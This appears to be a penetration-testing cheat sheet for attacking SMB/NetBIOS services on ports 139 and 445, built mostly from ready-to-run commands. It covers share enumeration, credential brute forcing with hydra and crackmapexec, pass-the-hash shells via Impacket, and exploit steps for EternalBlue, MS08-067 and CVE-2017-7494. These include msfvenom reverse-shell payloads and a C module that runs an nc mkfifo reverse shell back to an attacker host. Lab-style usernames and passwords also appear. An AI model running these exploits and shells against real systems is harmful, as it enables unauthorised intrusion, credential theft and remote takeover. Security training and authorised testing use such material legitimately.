🥸Port 138-139-445 (SMB/netbios)

Version if nmap didn’t detect it

Sometimes nmap doesn’t show the version of Samba in the remote host, if this happens, a good way to know which version the remote host is running, is to capture traffic with wireshark against the remote host on 445/139 and in parallel run an smbclient -L, do a follow tcp stream and with this we might see which version the server is running.

OR

sudo ngrep -i -d <INTERFACE> 's.?a.?m.?b.?a.*[[:digit:]]' port 139
smbclient -L <IP>

Scan for vulnerability

nmap -p139,445 --script "smb-vuln-* and not(smb-vuln-regsvc-dos)" --script-args smb-vuln-cve-2017-7494.check-version,unsafe=1 <IP>

If :

• MS17-010 - EternalBlue

• MS08-067 - MS08-067

• CVE-2017-7494 - CVE-2017-7494

Manual testing

smbmap -H <IP>
smbmap -u '' -p '' -H <IP>
smbmap -u 'guest' -p '' -H <IP>
smbmap -u '' -p '' -H <IP> -R

crackmapexec smb <IP>
crackmapexec smb <IP> -u '' -p ''
crackmapexec smb <IP> -u 'guest' -p ''
crackmapexec smb <IP> -u '' -p '' --shares

enum4linux -a <IP>

smbclient --no-pass -L //$IP
smbclient //<IP>/<SHARE>

# Download all files from a directory recursively
smbclient //<IP>/<SHARE> -U <USER> -c "prompt OFF;recurse ON;mget *"

Brute force

crackmapexec smb <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>
hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> smb://<IP> -u -vV

Mount a SMB share

mkdir /tmp/share
sudo mount -t cifs //<IP>/<SHARE> /tmp/share
sudo mount -t cifs -o 'username=<USER>,password=<PASSWORD>'//<IP>/<SHARE> /tmp/share

smbclient //<IP>/<SHARE>
smbclient //<IP>/<SHARE> -U <USER>

Get a shell

psexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
psexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>

wmiexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
wmiexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>

smbexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
smbexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>

atexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP> <COMMAND>
atexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>

EternalBlue (MS17-010)

https://github.com/3ndG4me/AutoBlue-MS17-010

Check if vulnerable

python eternal_checker.py <IP>

Prepare shellcodes and listeners

cd shellcode
./shell_prep.sh
cd ..
./listener_prep.sh

Exploit

python eternalblue_exploit<NUMBER>.py <IP> shellcode/sc_all.bin

May need to run it multiple times

If this doesn’t work, try this one

python zzz_exploit.py <IP>

MS08-067

# Download exploit code
git clone https://github.com/andyacer/ms08_067.git

# Generate payload
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
msfvenom -p windows/shell_bind_tcp RHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

# Modify
Modify ms08_067_2018.py and replace the shellcode variable by the one generated with msfvenom.

# Listener
nc -lvp <PORT>

# Exploit
python ms08_067_2018.py <IP> <NUMBER> 445

CVE-2017-7494

# Download exploit code
git clone https://github.com/joxeankoret/CVE-2017-7494

Create a new file named poc.c :

#include <stdio.h>
#include <stdlib.h>

int samba_init_module(void)
{
	setresuid(0,0,0);
	system("ping -c 3 <IP>");
}

# Build
gcc -o test.so -shared poc.c -fPIC

# Start an ICMP listener
sudo tcpdump -i <INTERFACE> icmp

# Exploit
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so

If you reiceve 3 pings on your listener then the exploit works. Now let’s get a shell :

#include <stdio.h>
#include <stdlib.h>

int samba_init_module(void)
{
	setresuid(0,0,0);
	system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f");
}

# Build
gcc -o test.so -shared poc.c -fPIC

# Start a listener
nc -lvp <PORT>

# Exploit
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so

nmap

root@kali:~# nmap -v -p 139,445 --script smb-vuln-* 192.168.56.101

nbtscan

root@kali nbtscan -r 192.168.11.0/24

enum4linux

root@kali:~# enum4linux -a 192.168.56.101

smbmap

smbmap -H 10.10.10.161
ADMIN$
C$
Data

smbmap -H 10.10.10.16 -R DATA #recursive search
smbmap -H 10.10.10.16 -R DATA --download 'Data\\Search\\archivo.txt'

• with credentials

  smbmap -u Tempuser -p Welcome123 -H 10.10.10.16 -R DATA

• enumerating

  smbmap -d active.htb -u SVC_TGS -p GPPsaras2012 -H 10.10.10.100

smbclient

smbclient \\\\$ip\\$share -I target -N
smbclient -N -L 192.168.168.168 - lists smb type (often displaying samba version) and various shares

mount

smbclient \\\\secnotes.htb\\new-site -U anonymous
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *

rpcclient

rpcclient -U "" target

Mount shares

mount -t cifs -o user=USERNAME,sec=ntlm,dir_mode=0077 "//10.10.10.10/My Share" /mnt/cifs

mount shares 2

sudo apt-get install cifs-utils
mkdir /mnt/Replication
mount -t cifs //10.10.10.100/Replication /mnt/Replication -o
username=<username>,password=<password>,domain=active.htb
grep -R password /mnt/Replication/

nmblookup

nmblookup is used to query NetBIOS names and map them to IP addresses in a network using NetBIOS over TCP/IP queries

 nmblookup -A target

accesschk

accesschk -v -t (target IP) -u user -P /usr/share/dirb/wordlists/common.txt - attempts to connect to $IPC or $ADMIN shares

shell when we have the credentials

root@kali:# psexec.py secnotes/administrator:@secnotes.htb
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:

shell 2 when i have credentials

winexe -U Administrator //10.0.0.0 "cmd.exe"

If SMB is up locally but the port is closed externally, then try a remote port forward back to your attacking machine:

plink.exe -l sshproxy -pw sshproxy -R 445:127.0.0.1:445 10.10.10.10
winexe -U Administrator //127.0.0.1 "cmd.exe"